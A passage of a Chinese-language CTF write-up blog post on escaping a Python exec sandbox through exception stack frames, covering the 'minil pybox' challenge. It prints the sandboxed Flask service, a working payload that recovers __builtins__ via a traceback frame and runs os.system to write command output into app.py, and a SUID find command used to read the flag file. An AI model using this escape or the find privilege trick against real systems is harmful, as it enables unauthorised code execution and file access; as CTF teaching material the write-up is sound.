class="hljs-string">&quot;__builtins__&quot;</span>: safe_builtins&#125;<br><br>    sys.stdout = io.StringIO()<br>    sys.stderr = io.StringIO()<br><br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-built_in">exec</span>(code, safe_globals)<br>        output = sys.stdout.getvalue()<br>        error = sys.stderr.getvalue()<br>        result_queue.put((<span class="hljs-string">&quot;ok&quot;</span>, output <span class="hljs-keyword">or</span> error))<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        result_queue.put((<span class="hljs-string">&quot;err&quot;</span>, <span class="hljs-built_in">str</span>(e)))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">safe_exec</span>(<span class="hljs-params">code: <span class="hljs-built_in">str</span>, timeout=<span class="hljs-number">1</span></span>):<br>    code = code.encode().decode(<span class="hljs-string">&#x27;unicode_escape&#x27;</span>)<br>    tree = ast.parse(code)<br>    SandboxVisitor().visit(tree)<br>    result_queue = multiprocessing.Queue()<br>    p = multiprocessing.Process(target=sandbox_executor, args=(code, result_queue))<br>    p.start()<br>    p.join(timeout=timeout)<br><br>    <span class="hljs-keyword">if</span> p.is_alive():<br>        p.terminate()<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Timeout: code took too long to run.&quot;</span><br><br>    <span class="hljs-keyword">try</span>:<br>        status, output = result_queue.get_nowait()<br>        <span class="hljs-keyword">return</span> output <span class="hljs-keyword">if</span> status == <span class="hljs-string">&quot;ok&quot;</span> <span class="hljs-keyword">else</span> <span class="hljs-string">f&quot;Error: <span class="hljs-subst">&#123;output&#125;</span>&quot;</span><br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Error: no output from sandbox.&quot;</span><br><br>CODE = <span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">def my_audit_checker(event,args):</span><br><span class="hljs-string">    allowed_events = [&quot;import&quot;, &quot;time.sleep&quot;, &quot;builtins.input&quot;, &quot;builtins.input/result&quot;]</span><br><span class="hljs-string">    if not list(filter(lambda x: event == x, allowed_events)):</span><br><span class="hljs-string">        raise Exception</span><br><span class="hljs-string">    if len(args) &gt; 0:</span><br><span class="hljs-string">        raise Exception</span><br><span class="hljs-string"></span><br><span class="hljs-string">addaudithook(my_audit_checker)</span><br><span class="hljs-string">print(&quot;&#123;&#125;&quot;)</span><br><span class="hljs-string"></span><br><span class="hljs-string">&quot;&quot;&quot;</span><br>badchars = <span class="hljs-string">&quot;\&quot;&#x27;|&amp;`+-*/()[]&#123;&#125;_.&quot;</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(__file__, <span class="hljs-string">&#x27;r&#x27;</span>).read()<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/execute&#x27;</span>,methods=[<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">execute</span>():<br>    text = request.form[<span class="hljs-string">&#x27;text&#x27;</span>]<br>    <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> badchars:<br>        <span class="hljs-keyword">if</span> char <span class="hljs-keyword">in</span> text:<br>            <span class="hljs-keyword">return</span> Response(<span class="hljs-string">&quot;Error&quot;</span>, status=<span class="hljs-number">400</span>)<br>    output=safe_exec(CODE.<span class="hljs-built_in">format</span>(text))<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(output)&gt;<span class="hljs-number">5</span>:<br>        <span class="hljs-keyword">return</span> Response(<span class="hljs-string">&quot;Error&quot;</span>, status=<span class="hljs-number">400</span>)<br>    <span class="hljs-keyword">return</span> Response(output, status=<span class="hljs-number">200</span>)<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>这边使用异常栈帧逃逸获取到 <code>__builtins__</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python">text=<span class="hljs-string">&quot;)</span><br><span class="hljs-string">list=lambda x:True</span><br><span class="hljs-string">len=lambda x:False</span><br><span class="hljs-string"></span><br><span class="hljs-string">try:</span><br><span class="hljs-string">    1/0</span><br><span class="hljs-string">except Exception as e:</span><br><span class="hljs-string">    frame = e.__traceback__.tb_frame.f_back</span><br><span class="hljs-string">    builtins = frame.f_globals[&#x27;__builtins__&#x27;]</span><br><span class="hljs-string">    builtins.exec(&quot;</span>builtins.<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).system(<span class="hljs-string">&#x27;ls / -al&gt;app.py&#x27;</span>)<span class="hljs-string">&quot;)   </span><br><span class="hljs-string">print(&quot;</span><br></code></pre></td></tr></table></figure>

<p>由于输出被限制，直接放到 app.py 或者自己写一个静态界面</p>
<p class='item-img' data-src='https://raw.githubusercontent.com/Yim1ngs/images/refs/heads/main/static/SsIzbZSynohh7hxKmCpcLVq2nCd.png'><img src="https://raw.githubusercontent.com/Yim1ngs/images/refs/heads/main/static/SsIzbZSynohh7hxKmCpcLVq2nCd.png"></p>
<p>可以看见其中有 flag 文件，但是直接读会有权限问题，无法回显，查看 <code>entrypoint.sh</code> 我们可以知道 <code>find</code> 被 <code>chmod 4755</code>，通过 find 可以对每一个找到的文件执行一个命令的机制，我们构造 <code>find . -exec cat /m1* \;</code> 到 app.py 可得到 flag</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2025/11/02/java%E5%AE%89%E5%85%A8--%E5%8F%8D%E5%B0%84(3)/">← 下一篇 java安全--反射(3)</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/11/01/hgame-SigninJava/">hgame-SigninJava 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a><a onclick="BgmControl()"><svg id="bgm-control" viewBox="0 0 30 34" fill="#18d1ff" style="width: 24px; transition: transform .3s;margin-top: 4px"><path d="M25.998 23.422V11.29h3.999v12.132h-3.999zM19.497 6.234h4.001v22.243h-4.001V6.234zM12.998.867h4v32.978h-4V.867zm-6.5 5.367h4.001v22.243H6.498V6.234zm-6.5 5.056h4v12.132h-4V11.29z"></path></svg><audio id="bgm" src="/audio/bgm.mp3" autoplay loop crossorigin="anonymous"> </audio></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">Yim1ngs</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%9F%E6%88%90%E5%99%A8%E9%80%83%E9%80%B8"><span class="toc-number">1.</span> <span class="toc-text">生成器逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%9F%E6%88%90%E5%99%A8"><span class="toc-number">1.1.</span> <span class="toc-text">生成器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%88%E5%B8%A7%E5%B1%9E%E6%80%A7%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">栈帧属性：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E5%B8%A7%E9%80%83%E9%80%B8"><span class="toc-number">1.1.2.</span> <span class="toc-text">生成器栈帧逃逸</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9A"><span class="toc-number">1.1.3.</span> <span class="toc-text">例题：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%82%E5%B8%B8%E6%A0%88%E5%B8%A7%E9%80%83%E9%80%B8"><span class="toc-number">2.</span> <span class="toc-text">异常栈帧逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-minil-pybox"><span class="toc-number">2.1.</span> <span class="toc-text">例题:minil pybox</span></a></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>